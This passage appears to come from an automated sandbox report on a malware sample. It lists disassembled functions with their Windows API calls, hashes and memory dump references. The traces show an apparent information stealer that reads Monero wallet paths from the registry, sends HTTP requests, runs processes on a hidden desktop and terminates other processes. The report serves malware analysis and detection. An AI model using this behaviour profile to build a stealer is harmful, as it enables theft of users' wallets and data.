                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE12E434E006659ADB01EF74DC92FAE7B7AAF86300F04A11DF40167292DFB45B46CB96
                                                                                                                                                                                                                                                  Function 0041F76E Relevance: 16.7, APIs: 11, Instructions: 175fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041FBAC), ref: 0041F77F
                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041FBAC), ref: 0041F7C3
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F7DF
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F7F9
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F800
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F810
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F835
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F849
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041F8D7
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041F8F6
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041F919
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$PointerReadUnothrow_t@std@@@__ehfuncinfo$??2@$HandleInformationSize
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 998994793-0
                                                                                                                                                                                                                                                  • Opcode ID: 84563d45de5e7e7dfbdedab2ba3d9c28b9990e6308a4cfc2197bd82fb4c0f57d
                                                                                                                                                                                                                                                  • Instruction ID: ddda595af80ec950f864e733dfaf86c15ba5cdc8ff8ff1ee9bb0ea447fc4cfe9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84563d45de5e7e7dfbdedab2ba3d9c28b9990e6308a4cfc2197bd82fb4c0f57d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6515771604305AFD724DF16C884EABBBE8FFC4714F50492EF58997201D734A84ACBA9
                                                                                                                                                                                                                                                  Function 009C8C08 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 263registrystringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009C8C2A
                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00000000,00020119,?), ref: 009C8C47
                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?), ref: 009C8C61
                                                                                                                                                                                                                                                    • Part of subcall function 009C39A7: lstrcpy.KERNEL32(00000000), ref: 009C39CA
                                                                                                                                                                                                                                                    • Part of subcall function 009C8952: FindFirstFileA.KERNEL32(?,?), ref: 009C89A7
                                                                                                                                                                                                                                                    • Part of subcall function 009C8952: lstrcat.KERNEL32(?,?), ref: 009C8A6B
                                                                                                                                                                                                                                                    • Part of subcall function 009C8952: lstrcat.KERNEL32(?), ref: 009C8A78
                                                                                                                                                                                                                                                    • Part of subcall function 009C8952: lstrcat.KERNEL32(?,?), ref: 009C8A86
                                                                                                                                                                                                                                                    • Part of subcall function 009C8952: lstrcat.KERNEL32(?,?), ref: 009C8A93
                                                                                                                                                                                                                                                    • Part of subcall function 009C8952: lstrcat.KERNEL32(?,?), ref: 009C8ACD
                                                                                                                                                                                                                                                    • Part of subcall function 009C8952: FindNextFileA.KERNEL32(00000000,?), ref: 009C8BB6
                                                                                                                                                                                                                                                    • Part of subcall function 009C8952: FindClose.KERNEL32(00000000), ref: 009C8BC5
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 009C8C6A
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C8C84
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 009C8C91
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$Find$CloseFile$FirstNextOpenQueryValuelstrcpymemset
                                                                                                                                                                                                                                                  • String ID: "6c$@6c$X6c
                                                                                                                                                                                                                                                  • API String ID: 358504995-2427117290
                                                                                                                                                                                                                                                  • Opcode ID: ce8f7ae3a830e0298fbfe742e94f4418e49632205cfaafa19303167fb0e32543
                                                                                                                                                                                                                                                  • Instruction ID: 923b01d326b7d77fcf1f7e68d725d49e02b60891e40297ff9020e9c84982e50d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce8f7ae3a830e0298fbfe742e94f4418e49632205cfaafa19303167fb0e32543
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55C15275D10748CADF01EFA8C982AFA77B4AF9D304B00D25DED4566112EB30AAD5CB92
                                                                                                                                                                                                                                                  Function 009B8A6E Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 199networkfileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 009C39A7: lstrcpy.KERNEL32(00000000), ref: 009C39CA
                                                                                                                                                                                                                                                    • Part of subcall function 009B6E47: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,009B6F0F,?,?,?,?), ref: 009B6E7A
                                                                                                                                                                                                                                                    • Part of subcall function 009B6E47: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?), ref: 009B6E86
                                                                                                                                                                                                                                                    • Part of subcall function 009B6E47: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,?), ref: 009B6E92
                                                                                                                                                                                                                                                    • Part of subcall function 009C3975: lstrcpy.KERNEL32(00000000,?), ref: 009C3999
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 009B8AEA
                                                                                                                                                                                                                                                  • InternetConnectA.WININET ref: 009B8B23
                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009B8B9B
                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET ref: 009B8BAF
                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 009B8BC7
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 009B8BFF
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 009B8C95
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 009B8D03
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$CloseHandleHttplstrcpy$ConnectFileInfoOptionQueryReadRequestSend
                                                                                                                                                                                                                                                  • String ID: p7c
                                                                                                                                                                                                                                                  • API String ID: 4244444472-4010549652
                                                                                                                                                                                                                                                  • Opcode ID: 22e25e8e46289607b9d5628619eb8ac4b8640834c60657c462aab1fc5886c734
                                                                                                                                                                                                                                                  • Instruction ID: 4973febf9895fbfd3fe55a0c76edbe7eba36b31469a7366a00c38958c8c57802
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22e25e8e46289607b9d5628619eb8ac4b8640834c60657c462aab1fc5886c734
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D571F071A002199FDB10DF60DD46BFEBBB9AF89310F00911DF845AB291DF749A49CBA1
                                                                                                                                                                                                                                                  Function 009BADF6 Relevance: 15.2, APIs: 10, Instructions: 191stringsleepprocessCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009BAE10
                                                                                                                                                                                                                                                  • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 009BAE7F
                                                                                                                                                                                                                                                  • CreateDesktopA.USER32 ref: 009BAEA3
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009BAEBA
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009BAEC6
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009BAED0
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009BAF0A
                                                                                                                                                                                                                                                  • CreateProcessA.KERNEL32 ref: 009BAFDB
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00001388), ref: 009BAFEE
                                                                                                                                                                                                                                                    • Part of subcall function 009C39A7: lstrcpy.KERNEL32(00000000), ref: 009C39CA
                                                                                                                                                                                                                                                    • Part of subcall function 009BAA28: memset.MSVCRT ref: 009BAAFC
                                                                                                                                                                                                                                                    • Part of subcall function 009C55A9: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009C55BF
                                                                                                                                                                                                                                                    • Part of subcall function 009C55A9: Process32First.KERNEL32(00000000,?), ref: 009C55C9
                                                                                                                                                                                                                                                    • Part of subcall function 009C55A9: Process32Next.KERNEL32(00000000,?), ref: 009C55D5
                                                                                                                                                                                                                                                    • Part of subcall function 009C55A9: OpenProcess.KERNEL32(00000001,00000000,?), ref: 009C55F9
                                                                                                                                                                                                                                                    • Part of subcall function 009C55A9: TerminateProcess.KERNEL32(00000000,00000000), ref: 009C5608
                                                                                                                                                                                                                                                    • Part of subcall function 009C55A9: CloseHandle.KERNEL32(00000000), ref: 009C560F
                                                                                                                                                                                                                                                    • Part of subcall function 009C55A9: Process32Next.KERNEL32(00000000,?), ref: 009C5617
                                                                                                                                                                                                                                                    • Part of subcall function 009C55A9: CloseHandle.KERNEL32(00000000), ref: 009C5622
                                                                                                                                                                                                                                                  • CloseDesktop.USER32(?), ref: 009BB0A2
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memset$CloseCreateDesktopProcessProcess32$HandleNextOpenlstrcat$FirstSleepSnapshotTerminateToolhelp32lstrcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2291945429-0
                                                                                                                                                                                                                                                  • Opcode ID: 0d6afacdb9a6ceaea191d692fe4955dc14e1571e053833d46d2c99cb42a5a63d
                                                                                                                                                                                                                                                  • Instruction ID: 219af442c6cedc030e39de1d8b5fb492acf20045d8072e37e96b5677dad779f1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d6afacdb9a6ceaea191d692fe4955dc14e1571e053833d46d2c99cb42a5a63d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB81C231C00749DADB01EF64DD46BE9BBB5BF95304F00D259F98866252EB70A7C4CB92
                                                                                                                                                                                                                                                  Function 004014C8 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 246filestringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004014E2
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040157E
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00401581
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 0040170F
                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,?), ref: 004017D8
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$CopyDeletelstrcatlstrlenmemset
                                                                                                                                                                                                                                                  • String ID: SOFTWARE\monero-project\monero-core$wallet_p$wallet_path
                                                                                                                                                                                                                                                  • API String ID: 828395603-903685976
                                                                                                                                                                                                                                                  • Opcode ID: 30b6d828dc5db3638bc25061e76f592fc5e068d0f52749ab509f5440504ce201
                                                                                                                                                                                                                                                  • Instruction ID: 4dde3ccee4fbd1d333b05f68180df663e1f9c0e41752a6095c3039ca6c7bdac9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30b6d828dc5db3638bc25061e76f592fc5e068d0f52749ab509f5440504ce201
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 15912BB5D006489BDF05EFA1CC42AEE7779AF45308F04912EF405671A2DB786A85CB98
                                                                                                                                                                                                                                                  Function 009C8F80 Relevance: 13.8, APIs: 9, Instructions: 267stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009C8F9C
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009C8FAD
                                                                                                                                                                                                                                                    • Part of subcall function 009C4D47: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 009C4D7F
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 009C8FEB
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C8FF9
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 009C9006
                                                                                                                                                                                                                                                    • Part of subcall function 009C3975: lstrcpy.KERNEL32(00000000,?), ref: 009C3999
                                                                                                                                                                                                                                                    • Part of subcall function 009C39A7: lstrcpy.KERNEL32(00000000), ref: 009C39CA
                                                                                                                                                                                                                                                    • Part of subcall function 009BB0D4: GetFileSizeEx.KERNEL32(00000000,?), ref: 009BB11C
                                                                                                                                                                                                                                                    • Part of subcall function 009BB0D4: LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 009BB13F
                                                                                                                                                                                                                                                    • Part of subcall function 009BB0D4: ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 009BB160
                                                                                                                                                                                                                                                    • Part of subcall function 009BB0D4: CloseHandle.KERNEL32(00000000), ref: 009BB186
                                                                                                                                                                                                                                                    • Part of subcall function 009C5202: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,009C9104,?,?,?), ref: 009C520D
                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,?,?,?), ref: 009C910D
                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 009C928E
                                                                                                                                                                                                                                                    • Part of subcall function 009BB19F: lstrlen.KERNEL32(?,00000000,?,00000000,?,?,009B882B,00000000,?,?,?,?,?,?,?), ref: 009BB1AD
                                                                                                                                                                                                                                                    • Part of subcall function 009BB19F: LocalAlloc.KERNEL32(00000040,00000000,?,009B882B,00000000,?,?,?,?,?,?,?), ref: 009BB1D8
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042EEFC), ref: 009C9238
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,-0000000C), ref: 009C924A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$Alloc$FileGlobalLocallstrcpymemset$CloseFolderFreeHandlePathReadSizelstrlen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 652918382-0
                                                                                                                                                                                                                                                  • Opcode ID: ffb8687492f831870c222a0275bad59cdba76b2a70563ac4df95714154973f44
                                                                                                                                                                                                                                                  • Instruction ID: 47ce466a4fb3c1f2010b8634fa0c2ab29883e4ba8dbbb2ebbe76b895ade430b1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffb8687492f831870c222a0275bad59cdba76b2a70563ac4df95714154973f44
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07B17E71D007099BDF10EFA4C886FEE77B8FF89300F008559E955A7252EB70AA49CB91
                                                                                                                                                                                                                                                  Function 009CF9D5 Relevance: 13.7, APIs: 9, Instructions: 175fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009CFE13), ref: 009CF9E6
                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,009CFE13), ref: 009CFA2A
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009CFA46
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009CFA67
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009CFA9C
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 009CFAB0
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009CFB3E
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009CFB5D
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009CFB80
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$PointerUnothrow_t@std@@@__ehfuncinfo$??2@$HandleInformationReadSize
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4184024484-0
                                                                                                                                                                                                                                                  • Opcode ID: 84563d45de5e7e7dfbdedab2ba3d9c28b9990e6308a4cfc2197bd82fb4c0f57d
                                                                                                                                                                                                                                                  • Instruction ID: 0d28e2108dc60ebdc3919efe85684079db3834add4d493568b06466e6f15d280
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84563d45de5e7e7dfbdedab2ba3d9c28b9990e6308a4cfc2197bd82fb4c0f57d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85514772604346ABD724CF15C894F6BBBE9FBC4704F51882DF98997201E734A805CBA6
                                                                                                                                                                                                                                                  Function 0041F51E Relevance: 13.6, APIs: 9, Instructions: 105stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,00010000,?,004200FB,?), ref: 0041F526
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00645128), ref: 0041F570
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0064512C), ref: 0041F5A7
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00645134), ref: 0041F5DC
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0064513C), ref: 0041F611
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00645144), ref: 0041F646
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0064514C), ref: 0041F67B
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00645154), ref: 0041F6A5
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0064515C), ref: 0041F6D6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1659193697-0
                                                                                                                                                                                                                                                  • Opcode ID: 8ecfe62204233b8180d5d713a15dd486603fff8ba4875434be9a5bcb2e84d819
                                                                                                                                                                                                                                                  • Instruction ID: b1bc6718bd93d0afd4b9143767effb8c204e4d7c234b08edbe8f1f012b2e33c7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ecfe62204233b8180d5d713a15dd486603fff8ba4875434be9a5bcb2e84d819
